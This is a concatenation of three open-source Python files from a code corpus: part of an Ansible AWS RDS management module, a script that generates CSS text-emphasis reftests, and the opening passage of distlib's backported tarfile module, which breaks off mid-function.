self.snapshot['SnapshotType'], 'iops': self.snapshot['Iops'], } return d def await_resource(conn, resource, status, module): start_time = time.time() wait_timeout = module.params.get('wait_timeout') + start_time check_interval = 5 while wait_timeout > time.time() and resource.status != status: time.sleep(check_interval) if wait_timeout <= time.time(): module.fail_json(msg="Timeout waiting for RDS resource %s" % resource.name) if module.params.get('command') == 'snapshot': # Temporary until all the rds2 commands have their responses parsed if resource.name is None: module.fail_json(msg="There was a problem waiting for RDS snapshot %s" % resource.snapshot) # Back off if we're getting throttled, since we're just waiting anyway resource = AWSRetry.backoff(tries=5, delay=20, backoff=1.5)(conn.get_db_snapshot)(resource.name) else: # Temporary until all the rds2 commands have their responses parsed if resource.name is None: module.fail_json(msg="There was a problem waiting for RDS instance %s" % resource.instance) # Back off if we're getting throttled, since we're just waiting anyway resource = AWSRetry.backoff(tries=5, delay=20, 
backoff=1.5)(conn.get_db_instance)(resource.name) if resource is None: break # Some RDS resources take much longer than others to be ready. Check # less aggressively for slow ones to avoid throttling. if time.time() > start_time + 90: check_interval = 20 return resource def create_db_instance(module, conn): subnet = module.params.get('subnet') required_vars = ['instance_name', 'db_engine', 'size', 'instance_type', 'username', 'password'] valid_vars = ['backup_retention', 'backup_window', 'character_set_name', 'db_name', 'engine_version', 'instance_type', 'iops', 'license_model', 'maint_window', 'multi_zone', 'option_group', 'parameter_group', 'port', 'subnet', 'upgrade', 'zone'] if module.params.get('subnet'): valid_vars.append('vpc_security_groups') else: valid_vars.append('security_groups') if has_rds2: valid_vars.extend(['publicly_accessible', 'tags']) params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') result = conn.get_db_instance(instance_name) if result: changed = False else: try: result = conn.create_db_instance(instance_name, module.params.get('size'), module.params.get('instance_type'), module.params.get('db_engine'), module.params.get('username'), module.params.get('password'), **params) changed = True except RDSException as e: module.fail_json(msg="Failed to create instance: %s" % e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def replicate_db_instance(module, conn): required_vars = ['instance_name', 'source_instance'] valid_vars = ['instance_type', 'port', 'upgrade', 'zone'] if has_rds2: valid_vars.extend(['iops', 'option_group', 'publicly_accessible', 'tags']) params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') source_instance = module.params.get('source_instance') result = conn.get_db_instance(instance_name) if result: changed = False else: try: result = conn.create_db_instance_read_replica(instance_name, source_instance, **params) changed = True except RDSException as e: module.fail_json(msg="Failed to create replica instance: %s " % e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def delete_db_instance_or_snapshot(module, conn): required_vars = [] valid_vars = ['instance_name', 'snapshot', 'skip_final_snapshot'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') snapshot = module.params.get('snapshot') if not instance_name: result = conn.get_db_snapshot(snapshot) else: result = conn.get_db_instance(instance_name) if not result: module.exit_json(changed=False) if result.status == 'deleting': module.exit_json(changed=False) try: if instance_name: if snapshot: params["skip_final_snapshot"] = False if has_rds2: params["final_db_snapshot_identifier"] = snapshot else: params["final_snapshot_id"] = snapshot else: params["skip_final_snapshot"] = True result = conn.delete_db_instance(instance_name, **params) else: result = conn.delete_db_snapshot(snapshot) except RDSException as e: module.fail_json(msg="Failed to delete instance: %s" % e.message) # If we're not waiting for a delete to complete then we're all done # so just return if not 
module.params.get('wait'): module.exit_json(changed=True) try: resource = await_resource(conn, result, 'deleted', module) module.exit_json(changed=True) except RDSException as e: if e.code == 'DBInstanceNotFound': module.exit_json(changed=True) else: module.fail_json(msg=e.message) except Exception as e: module.fail_json(msg=str(e)) def facts_db_instance_or_snapshot(module, conn): required_vars = [] valid_vars = ['instance_name', 'snapshot'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') snapshot = module.params.get('snapshot') if instance_name and snapshot: module.fail_json(msg="Facts must be called with either instance_name or snapshot, not both") if instance_name: resource = conn.get_db_instance(instance_name) if not resource: module.fail_json(msg="DB instance %s does not exist" % instance_name) if snapshot: resource = conn.get_db_snapshot(snapshot) if not resource: module.fail_json(msg="DB snapshot %s does not exist" % snapshot) module.exit_json(changed=False, instance=resource.get_data()) def modify_db_instance(module, conn): required_vars = ['instance_name'] valid_vars = ['apply_immediately', 'backup_retention', 'backup_window', 'db_name', 'engine_version', 'instance_type', 'iops', 'license_model', 'maint_window', 'multi_zone', 'new_instance_name', 'option_group', 'parameter_group', 'password', 'size', 'upgrade'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') new_instance_name = module.params.get('new_instance_name') try: result = conn.modify_db_instance(instance_name, **params) except RDSException as e: module.fail_json(msg=e.message) if params.get('apply_immediately'): if new_instance_name: # Wait until the new instance name is valid new_instance = None while not new_instance: new_instance = conn.get_db_instance(new_instance_name) time.sleep(5) # Found instance but it briefly flicks to available # before rebooting so let's wait until we see it rebooting # before we check whether to 'wait' result = await_resource(conn, new_instance, 'rebooting', module) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) # guess that this changed the DB, need a way to check module.exit_json(changed=True, instance=resource.get_data()) def promote_db_instance(module, conn): required_vars = ['instance_name'] valid_vars = ['backup_retention', 'backup_window'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') result = conn.get_db_instance(instance_name) if not result: module.fail_json(msg="DB Instance %s does not exist" % instance_name) if result.get_data().get('replication_source'): try: result = conn.promote_read_replica(instance_name, **params) changed = True except RDSException as e: module.fail_json(msg=e.message) else: changed = False if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def snapshot_db_instance(module, conn): required_vars = ['instance_name', 'snapshot'] valid_vars = ['tags'] params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') snapshot = module.params.get('snapshot') changed = False result = conn.get_db_snapshot(snapshot) if not result: try: result = 
conn.create_db_snapshot(snapshot, instance_name, **params) changed = True except RDSException as e: module.fail_json(msg=e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_snapshot(snapshot) module.exit_json(changed=changed, snapshot=resource.get_data()) def reboot_db_instance(module, conn): required_vars = ['instance_name'] valid_vars = [] if has_rds2: valid_vars.append('force_failover') params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') result = conn.get_db_instance(instance_name) changed = False try: result = conn.reboot_db_instance(instance_name, **params) changed = True except RDSException as e: module.fail_json(msg=e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def restore_db_instance(module, conn): required_vars = ['instance_name', 'snapshot'] valid_vars = ['db_name', 'iops', 'license_model', 'multi_zone', 'option_group', 'port', 'publicly_accessible', 'subnet', 'tags', 'upgrade', 'zone'] if has_rds2: valid_vars.append('instance_type') else: required_vars.append('instance_type') params = validate_parameters(required_vars, valid_vars, module) instance_name = module.params.get('instance_name') instance_type = module.params.get('instance_type') snapshot = module.params.get('snapshot') changed = False result = conn.get_db_instance(instance_name) if not result: try: result = conn.restore_db_instance_from_db_snapshot(instance_name, snapshot, instance_type, **params) changed = True except RDSException as e: module.fail_json(msg=e.message) if module.params.get('wait'): resource = await_resource(conn, result, 'available', module) else: resource = conn.get_db_instance(instance_name) module.exit_json(changed=changed, instance=resource.get_data()) def validate_parameters(required_vars, valid_vars, module): command = module.params.get('command') for v in required_vars: if not module.params.get(v): module.fail_json(msg="Parameter %s required for %s command" % (v, command)) # map to convert rds module options to boto rds and rds2 options optional_params = { 'port': 'port', 'db_name': 'db_name', 'zone': 'availability_zone', 'maint_window': 'preferred_maintenance_window', 'backup_window': 'preferred_backup_window', 'backup_retention': 'backup_retention_period', 'multi_zone': 'multi_az', 'engine_version': 'engine_version', 'upgrade': 'auto_minor_version_upgrade', 'subnet': 'db_subnet_group_name', 'license_model': 'license_model', 'option_group': 'option_group_name', 'size': 'allocated_storage', 'iops': 'iops', 'new_instance_name': 'new_instance_id', 'apply_immediately': 'apply_immediately', } # map to convert rds module options to boto rds options optional_params_rds = { 'db_engine': 'engine', 'password': 'master_password', 'parameter_group': 'param_group', 'instance_type': 'instance_class', } # map to convert rds module options to boto rds2 options optional_params_rds2 = { 'tags': 'tags', 'publicly_accessible': 'publicly_accessible', 'parameter_group': 'db_parameter_group_name', 'character_set_name': 'character_set_name', 'instance_type': 'db_instance_class', 'password': 'master_user_password', 'new_instance_name': 'new_db_instance_identifier', 'force_failover': 'force_failover', } if has_rds2: optional_params.update(optional_params_rds2) sec_group = 'db_security_groups' else: 
optional_params.update(optional_params_rds) sec_group = 'security_groups' # Check for options only supported with rds2 for k in set(optional_params_rds2.keys()) - set(optional_params_rds.keys()): if module.params.get(k): module.fail_json(msg="Parameter %s requires boto.rds (boto >= 2.26.0)" % k) params = {} for (k, v) in optional_params.items(): if module.params.get(k) is not None and k not in required_vars: if k in valid_vars: params[v] = module.params[k] else: if module.params.get(k) is False: pass else: module.fail_json(msg="Parameter %s is not valid for %s command" % (k, command)) if module.params.get('security_groups'): params[sec_group] = module.params.get('security_groups').split(',') vpc_groups = module.params.get('vpc_security_groups') if vpc_groups: if has_rds2: params['vpc_security_group_ids'] = vpc_groups else: groups_list = [] for x in vpc_groups: groups_list.append(boto.rds.VPCSecurityGroupMembership(vpc_group=x)) params['vpc_security_groups'] = groups_list # Convert tags dict to list of tuples that rds2 expects if 'tags' in params: params['tags'] = module.params['tags'].items() return params def main(): argument_spec = ec2_argument_spec() argument_spec.update(dict( command=dict(choices=['create', 'replicate', 'delete', 'facts', 'modify', 'promote', 'snapshot', 'reboot', 'restore'], required=True), instance_name=dict(required=False), source_instance=dict(required=False), db_engine=dict(choices=['mariadb', 'MySQL', 'oracle-se1', 'oracle-se2', 'oracle-se', 'oracle-ee', 'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex', 'sqlserver-web', 'postgres', 'aurora'], required=False), size=dict(required=False), instance_type=dict(aliases=['type'], required=False), username=dict(required=False), password=dict(no_log=True, required=False), db_name=dict(required=False), engine_version=dict(required=False), parameter_group=dict(required=False), license_model=dict(choices=['license-included', 'bring-your-own-license', 'general-public-license', 'postgresql-license'], required=False), multi_zone=dict(type='bool', required=False), iops=dict(required=False), security_groups=dict(required=False), vpc_security_groups=dict(type='list', required=False), port=dict(required=False, type='int'), upgrade=dict(type='bool', default=False), option_group=dict(required=False), maint_window=dict(required=False), backup_window=dict(required=False), backup_retention=dict(required=False), zone=dict(aliases=['aws_zone', 'ec2_zone'], required=False), subnet=dict(required=False), wait=dict(type='bool', default=False), wait_timeout=dict(type='int', default=300), snapshot=dict(required=False), apply_immediately=dict(type='bool', default=False), new_instance_name=dict(required=False), tags=dict(type='dict', required=False), publicly_accessible=dict(required=False), character_set_name=dict(required=False), force_failover=dict(type='bool', required=False, default=False) ) ) module = AnsibleModule( argument_spec=argument_spec, ) if not HAS_BOTO: module.fail_json(msg='boto required for this module') invocations = { 'create': create_db_instance, 'replicate': replicate_db_instance, 'delete': delete_db_instance_or_snapshot, 'facts': facts_db_instance_or_snapshot, 'modify': modify_db_instance, 'promote': promote_db_instance, 'snapshot': snapshot_db_instance, 'reboot': reboot_db_instance, 'restore': restore_db_instance, } region, ec2_url, aws_connect_params = get_aws_connection_info(module) if not region: module.fail_json(msg="Region not specified. 
Unable to determine region from EC2_REGION.") # set port to per db defaults if not specified if module.params['port'] is None and module.params['db_engine'] is not None and module.params['command'] == 'create': if '-' in module.params['db_engine']: engine = module.params['db_engine'].split('-')[0] else: engine = module.params['db_engine'] module.params['port'] = DEFAULT_PORTS[engine.lower()] # connect to the rds endpoint if has_rds2: conn = RDS2Connection(module, region, **aws_connect_params) else: conn = RDSConnection(module, region, **aws_connect_params) invocations[module.params.get('command')](module, conn) # import module snippets from ansible.module_utils.basic import * from ansible.module_utils.ec2 import * if __name__ == '__main__': main()
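One piece of this module that is easy to check in isolation is the engine-to-port defaulting done at the bottom of main(). The sketch below restates that lookup as a standalone function; resolve_default_port is a made-up helper name used only for illustration, not part of the module:

# Standalone restatement of the default-port lookup performed in main() above.
# resolve_default_port is a hypothetical name, not part of the rds module.
DEFAULT_PORTS = {
    'aurora': 3306,
    'mariadb': 3306,
    'mysql': 3306,
    'oracle': 1521,
    'sqlserver': 1433,
    'postgres': 5432,
}


def resolve_default_port(db_engine):
    # Variants such as 'oracle-se1' or 'sqlserver-web' fall back to their family.
    engine = db_engine.split('-')[0] if '-' in db_engine else db_engine
    return DEFAULT_PORTS[engine.lower()]


if __name__ == '__main__':
    assert resolve_default_port('MySQL') == 3306
    assert resolve_default_port('oracle-se1') == 1521
    assert resolve_default_port('sqlserver-web') == 1433
    assert resolve_default_port('postgres') == 5432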
bd339/servo
refs/heads/master
tests/wpt/web-platform-tests/css/vendor-imports/mozilla/mozilla-central-reftests/text-decor-3/support/generate-text-emphasis-line-height-tests.py
829
#!/usr/bin/env python
# - * - coding: UTF-8 - * -

"""
This script generates tests text-emphasis-line-height-001 ~ 004
except 001z. They test the line height expansion in different
directions. This script outputs a list of all tests it generated
in the format of Mozilla reftest.list to the stdout.
"""

from __future__ import unicode_literals

TEST_FILE = 'text-emphasis-line-height-{:03}{}.html'
TEST_TEMPLATE = '''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Test: text-emphasis line height, {pos}, {wm}, {tag}</title>
<link rel="author" title="Xidorn Quan" href="https://www.upsuper.org">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<link rel="help" href="https://drafts.csswg.org/css-text-decor-3/#text-emphasis-position-property">
<meta name="assert" content="text emphasis marks should expand the line height like ruby if necessary">
<link rel="match" href="text-emphasis-line-height-{index:03}-ref.html">
<p>Pass if the emphasis marks are {dir} the black line:</p>
{start}試験テスト{end}
'''

REF_FILE = 'text-emphasis-line-height-{:03}-ref.html'
REF_TEMPLATE='''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Reference: text-emphasis line height, {pos}</title>
<link rel="author" title="Xidorn Quan" href="https://www.upsuper.org">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<style> rt {{ font-variant-east-asian: inherit; }} </style>
<p>Pass if the emphasis marks are {dir} the black line:</p>
<div style="line-height: 1; border-{pos}: 1px solid black; writing-mode: {wm}; ruby-position: {posval}"><ruby>試<rt>&#x25CF;</rt>験<rt>&#x25CF;</rt>テ<rt>&#x25CF;</rt>ス<rt>&#x25CF;</rt>ト<rt>&#x25CF;</rt></ruby></div>
'''

STYLE1 = 'line-height: 1; border-{pos}: 1px solid black; ' + \
         'writing-mode: {wm}; text-emphasis-position: {posval};'
STYLE2 = 'text-emphasis: circle;'

TAGS = [
    # (tag, start, end)
    ('div', '<div style="{style1}{style2}">', '</div>'),
    ('span', '<div style="{style1}"><span style="{style2}">', '</span></div>'),
]
POSITIONS = [
    # pos, text-emphasis-position, ruby-position,
    # writing-modes, dir text
    ('top', 'over right', 'over',
     ['horizontal-tb'], 'below'),
    ('bottom', 'under right', 'under',
     ['horizontal-tb'], 'over'),
    ('right', 'over right', 'over',
     ['vertical-rl', 'vertical-lr'], 'to the left of'),
    ('left', 'over left', 'under',
     ['vertical-rl', 'vertical-lr'], 'to the right of'),
]

import string

def write_file(filename, content):
    with open(filename, 'wb') as f:
        f.write(content.encode('UTF-8'))

print("# START tests from {}".format(__file__))
idx = 0
for (pos, emphasis_pos, ruby_pos, wms, dir) in POSITIONS:
    idx += 1
    ref_file = REF_FILE.format(idx)
    content = REF_TEMPLATE.format(pos=pos, dir=dir, wm=wms[0], posval=ruby_pos)
    write_file(ref_file, content)
    suffix = iter(string.ascii_lowercase)
    for wm in wms:
        style1 = STYLE1.format(pos=pos, wm=wm, posval=emphasis_pos)
        for (tag, start, end) in TAGS:
            test_file = TEST_FILE.format(idx, next(suffix))
            content = TEST_TEMPLATE.format(
                pos=pos, wm=wm, tag=tag, index=idx, dir=dir,
                start=start.format(style1=style1, style2=STYLE2),
                end=end)
            write_file(test_file, content)
            print("== {} {}".format(test_file, ref_file))
print("# END tests from {}".format(__file__))
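To see the naming scheme without writing any files, the loop structure above can be dry-run with only the fields that matter for file names. In this simplified sketch, POSITIONS is reduced to the position name and its writing modes, and nothing is written to disk:

# Dry run of the test/reference pairing emitted by the generator above.
# POSITIONS is reduced here to just the fields that affect file naming.
import string

POSITIONS = [
    ('top', ['horizontal-tb']),
    ('bottom', ['horizontal-tb']),
    ('right', ['vertical-rl', 'vertical-lr']),
    ('left', ['vertical-rl', 'vertical-lr']),
]
TAGS = ['div', 'span']

for idx, (pos, wms) in enumerate(POSITIONS, start=1):
    ref_file = 'text-emphasis-line-height-{:03}-ref.html'.format(idx)
    suffix = iter(string.ascii_lowercase)
    for wm in wms:
        for tag in TAGS:
            test_file = 'text-emphasis-line-height-{:03}{}.html'.format(idx, next(suffix))
            print("== {} {}".format(test_file, ref_file))
# Prints lines such as:
# == text-emphasis-line-height-003a.html text-emphasis-line-height-003-ref.html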
jjas0nn/solvem
refs/heads/master
tensorflow/lib/python2.7/site-packages/pip/_vendor/distlib/_backport/tarfile.py
422
#------------------------------------------------------------------- # tarfile.py #------------------------------------------------------------------- # Copyright (C) 2002 Lars Gustaebel <lars@gustaebel.de> # All rights reserved. # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following # conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # from __future__ import print_function """Read from and write to tar format archives. """ __version__ = "$Revision$" version = "0.9.0" __author__ = "Lars Gust\u00e4bel (lars@gustaebel.de)" __date__ = "$Date: 2011-02-25 17:42:01 +0200 (Fri, 25 Feb 2011) $" __cvsid__ = "$Id: tarfile.py 88586 2011-02-25 15:42:01Z marc-andre.lemburg $" __credits__ = "Gustavo Niemeyer, Niels Gust\u00e4bel, Richard Townsend." #--------- # Imports #--------- import sys import os import stat import errno import time import struct import copy import re try: import grp, pwd except ImportError: grp = pwd = None # os.symlink on Windows prior to 6.0 raises NotImplementedError symlink_exception = (AttributeError, NotImplementedError) try: # WindowsError (1314) will be raised if the caller does not hold the # SeCreateSymbolicLinkPrivilege privilege symlink_exception += (WindowsError,) except NameError: pass # from tarfile import * __all__ = ["TarFile", "TarInfo", "is_tarfile", "TarError"] if sys.version_info[0] < 3: import __builtin__ as builtins else: import builtins _open = builtins.open # Since 'open' is TarFile.open #--------------------------------------------------------- # tar constants #--------------------------------------------------------- NUL = b"\0" # the null character BLOCKSIZE = 512 # length of processing blocks RECORDSIZE = BLOCKSIZE * 20 # length of records GNU_MAGIC = b"ustar \0" # magic gnu tar string POSIX_MAGIC = b"ustar\x0000" # magic posix tar string LENGTH_NAME = 100 # maximum length of a filename LENGTH_LINK = 100 # maximum length of a linkname LENGTH_PREFIX = 155 # maximum length of the prefix field REGTYPE = b"0" # regular file AREGTYPE = b"\0" # regular file LNKTYPE = b"1" # link (inside tarfile) SYMTYPE = b"2" # symbolic link CHRTYPE = b"3" # character special device BLKTYPE = b"4" # block special device DIRTYPE = b"5" # directory FIFOTYPE = b"6" # fifo special device CONTTYPE = b"7" # contiguous file GNUTYPE_LONGNAME = b"L" # GNU tar longname GNUTYPE_LONGLINK = b"K" # GNU tar longlink GNUTYPE_SPARSE = b"S" # GNU tar sparse file XHDTYPE = b"x" # POSIX.1-2001 extended header XGLTYPE = b"g" # POSIX.1-2001 global header SOLARIS_XHDTYPE = b"X" # Solaris extended header USTAR_FORMAT = 0 # POSIX.1-1988 (ustar) format GNU_FORMAT 
= 1 # GNU tar format PAX_FORMAT = 2 # POSIX.1-2001 (pax) format DEFAULT_FORMAT = GNU_FORMAT #--------------------------------------------------------- # tarfile constants #--------------------------------------------------------- # File types that tarfile supports: SUPPORTED_TYPES = (REGTYPE, AREGTYPE, LNKTYPE, SYMTYPE, DIRTYPE, FIFOTYPE, CONTTYPE, CHRTYPE, BLKTYPE, GNUTYPE_LONGNAME, GNUTYPE_LONGLINK, GNUTYPE_SPARSE) # File types that will be treated as a regular file. REGULAR_TYPES = (REGTYPE, AREGTYPE, CONTTYPE, GNUTYPE_SPARSE) # File types that are part of the GNU tar format. GNU_TYPES = (GNUTYPE_LONGNAME, GNUTYPE_LONGLINK, GNUTYPE_SPARSE) # Fields from a pax header that override a TarInfo attribute. PAX_FIELDS = ("path", "linkpath", "size", "mtime", "uid", "gid", "uname", "gname") # Fields from a pax header that are affected by hdrcharset. PAX_NAME_FIELDS = set(("path", "linkpath", "uname", "gname")) # Fields in a pax header that are numbers, all other fields # are treated as strings. PAX_NUMBER_FIELDS = { "atime": float, "ctime": float, "mtime": float, "uid": int, "gid": int, "size": int } #--------------------------------------------------------- # Bits used in the mode field, values in octal. #--------------------------------------------------------- S_IFLNK = 0o120000 # symbolic link S_IFREG = 0o100000 # regular file S_IFBLK = 0o060000 # block device S_IFDIR = 0o040000 # directory S_IFCHR = 0o020000 # character device S_IFIFO = 0o010000 # fifo TSUID = 0o4000 # set UID on execution TSGID = 0o2000 # set GID on execution TSVTX = 0o1000 # reserved TUREAD = 0o400 # read by owner TUWRITE = 0o200 # write by owner TUEXEC = 0o100 # execute/search by owner TGREAD = 0o040 # read by group TGWRITE = 0o020 # write by group TGEXEC = 0o010 # execute/search by group TOREAD = 0o004 # read by other TOWRITE = 0o002 # write by other TOEXEC = 0o001 # execute/search by other #--------------------------------------------------------- # initialization #--------------------------------------------------------- if os.name in ("nt", "ce"): ENCODING = "utf-8" else: ENCODING = sys.getfilesystemencoding() #--------------------------------------------------------- # Some useful functions #--------------------------------------------------------- def stn(s, length, encoding, errors): """Convert a string to a null-terminated bytes object. """ s = s.encode(encoding, errors) return s[:length] + (length - len(s)) * NUL def nts(s, encoding, errors): """Convert a null-terminated bytes object to a string. """ p = s.find(b"\0") if p != -1: s = s[:p] return s.decode(encoding, errors) def nti(s): """Convert a number field to a python number. """ # There are two possible encodings for a number field, see # itn() below. if s[0] != chr(0o200): try: n = int(nts(s, "ascii", "strict") or "0", 8) except ValueError: raise InvalidHeaderError("invalid header") else: n = 0 for i in range(len(s) - 1): n <<= 8 n += ord(s[i + 1]) return n def itn(n, digits=8, format=DEFAULT_FORMAT): """Convert a python number to a number field. """ # POSIX 1003.1-1988 requires numbers to be encoded as a string of # octal digits followed by a null-byte, this allows values up to # (8**(digits-1))-1. GNU tar allows storing numbers greater than # that if necessary. A leading 0o200 byte indicates this particular # encoding, the following digits-1 bytes are a big-endian # representation. This allows values up to (256**(digits-1))-1. 
if 0 <= n < 8 ** (digits - 1): s = ("%0*o" % (digits - 1, n)).encode("ascii") + NUL else: if format != GNU_FORMAT or n >= 256 ** (digits - 1): raise ValueError("overflow in number field") if n < 0: # XXX We mimic GNU tar's behaviour with negative numbers, # this could raise OverflowError. n = struct.unpack("L", struct.pack("l", n))[0] s = bytearray() for i in range(digits - 1): s.insert(0, n & 0o377) n >>= 8 s.insert(0, 0o200) return s def calc_chksums(buf): """Calculate the checksum for a member's header by summing up all characters except for the chksum field which is treated as if it was filled with spaces. According to the GNU tar sources, some tars (Sun and NeXT) calculate chksum with signed char, which will be different if there are chars in the buffer with the high bit set. So we calculate two checksums, unsigned and signed. """ unsigned_chksum = 256 + sum(struct.unpack("148B", buf[:148]) + struct.unpack("356B", buf[156:512])) signed_chksum = 256 + sum(struct.unpack("148b", buf[:148]) + struct.unpack("356b", buf[156:512])) return unsigned_chksum, signed_chksum def copyfileobj(src, dst, length=None): """Copy length bytes from fileobj src to fileobj dst. If length is None, copy the entire content. """ if length == 0: return if length is None: while True: buf = src.read(16*1024) if not buf: break dst.write(buf) return BUFSIZE = 16 * 1024 blocks, remainder = divmod(length, BUFSIZE) for b in range(blocks): buf = src.read(BUFSIZE) if len(buf) < BUFSIZE: raise IOError("end of file reached") dst.write(buf) if remainder != 0: buf = src.read(remainder) if len(buf) < remainder: raise IOError("end of file reached") dst.write(buf) return filemode_table = ( ((S_IFLNK, "l"), (S_IFREG, "-"), (S_IFBLK, "b"), (S_IFDIR, "d"), (S_IFCHR, "c"), (S_IFIFO, "p")), ((TUREAD, "r"),), ((TUWRITE, "w"),), ((TUEXEC|TSUID, "s"), (TSUID, "S"), (TUEXEC, "x")), ((TGREAD, "r"),), ((TGWRITE, "w"),), ((TGEXEC|TSGID, "s"), (TSGID, "S"), (TGEXEC, "x")), ((TOREAD, "r"),), ((TOWRITE, "w"),), ((TOEXEC|TSVTX, "t"), (TSVTX, "T"), (TOEXEC, "x")) ) def filemode(mode): """Convert a file's mode to a string of the form -rwxrwxrwx. Used by TarFile.list() """ perm = [] for table in filemode_table: for bit, char in table: if mode & bit == bit: perm.append(char) break else: perm.append("-") return "".join(perm) class TarError(Exception): """Base exception.""" pass class ExtractError(TarError): """General exception for extract errors.""" pass class ReadError(TarError): """Exception for unreadable tar archives.""" pass class CompressionError(TarError): """Exception for unavailable compression methods.""" pass class StreamError(TarError): """Exception for unsupported operations on stream-like TarFiles.""" pass class HeaderError(TarError): """Base exception for header errors.""" pass class EmptyHeaderError(HeaderError): """Exception for empty headers.""" pass class TruncatedHeaderError(HeaderError): """Exception for truncated headers.""" pass class EOFHeaderError(HeaderError): """Exception for end of file headers.""" pass class InvalidHeaderError(HeaderError): """Exception for invalid headers.""" pass class SubsequentHeaderError(HeaderError): """Exception for missing and invalid extended headers.""" pass #--------------------------- # internal stream interface #--------------------------- class _LowLevelFile(object): """Low-level file object. Supports reading and writing. It is used instead of a regular file object for streaming access. 
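       On platforms that define os.O_BINARY (Windows) the file is opened
       in binary mode, so no newline translation takes place.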
""" def __init__(self, name, mode): mode = { "r": os.O_RDONLY, "w": os.O_WRONLY | os.O_CREAT | os.O_TRUNC, }[mode] if hasattr(os, "O_BINARY"): mode |= os.O_BINARY self.fd = os.open(name, mode, 0o666) def close(self): os.close(self.fd) def read(self, size): return os.read(self.fd, size) def write(self, s): os.write(self.fd, s) class _Stream(object): """Class that serves as an adapter between TarFile and a stream-like object. The stream-like object only needs to have a read() or write() method and is accessed blockwise. Use of gzip or bzip2 compression is possible. A stream-like object could be for example: sys.stdin, sys.stdout, a socket, a tape device etc. _Stream is intended to be used only internally. """ def __init__(self, name, mode, comptype, fileobj, bufsize): """Construct a _Stream object. """ self._extfileobj = True if fileobj is None: fileobj = _LowLevelFile(name, mode) self._extfileobj = False if comptype == '*': # Enable transparent compression detection for the # stream interface fileobj = _StreamProxy(fileobj) comptype = fileobj.getcomptype() self.name = name or "" self.mode = mode self.comptype = comptype self.fileobj = fileobj self.bufsize = bufsize self.buf = b"" self.pos = 0 self.closed = False try: if comptype == "gz": try: import zlib except ImportError: raise CompressionError("zlib module is not available") self.zlib = zlib self.crc = zlib.crc32(b"") if mode == "r": self._init_read_gz() else: self._init_write_gz() if comptype == "bz2": try: import bz2 except ImportError: raise CompressionError("bz2 module is not available") if mode == "r": self.dbuf = b"" self.cmp = bz2.BZ2Decompressor() else: self.cmp = bz2.BZ2Compressor() except: if not self._extfileobj: self.fileobj.close() self.closed = True raise def __del__(self): if hasattr(self, "closed") and not self.closed: self.close() def _init_write_gz(self): """Initialize for writing with gzip compression. """ self.cmp = self.zlib.compressobj(9, self.zlib.DEFLATED, -self.zlib.MAX_WBITS, self.zlib.DEF_MEM_LEVEL, 0) timestamp = struct.pack("<L", int(time.time())) self.__write(b"\037\213\010\010" + timestamp + b"\002\377") if self.name.endswith(".gz"): self.name = self.name[:-3] # RFC1952 says we must use ISO-8859-1 for the FNAME field. self.__write(self.name.encode("iso-8859-1", "replace") + NUL) def write(self, s): """Write string s to the stream. """ if self.comptype == "gz": self.crc = self.zlib.crc32(s, self.crc) self.pos += len(s) if self.comptype != "tar": s = self.cmp.compress(s) self.__write(s) def __write(self, s): """Write string s to the stream if a whole new block is ready to be written. """ self.buf += s while len(self.buf) > self.bufsize: self.fileobj.write(self.buf[:self.bufsize]) self.buf = self.buf[self.bufsize:] def close(self): """Close the _Stream object. No operation should be done on it afterwards. """ if self.closed: return if self.mode == "w" and self.comptype != "tar": self.buf += self.cmp.flush() if self.mode == "w" and self.buf: self.fileobj.write(self.buf) self.buf = b"" if self.comptype == "gz": # The native zlib crc is an unsigned 32-bit integer, but # the Python wrapper implicitly casts that to a signed C # long. So, on a 32-bit box self.crc may "look negative", # while the same crc on a 64-bit box may "look positive". # To avoid irksome warnings from the `struct` module, force # it to look positive on all boxes. 
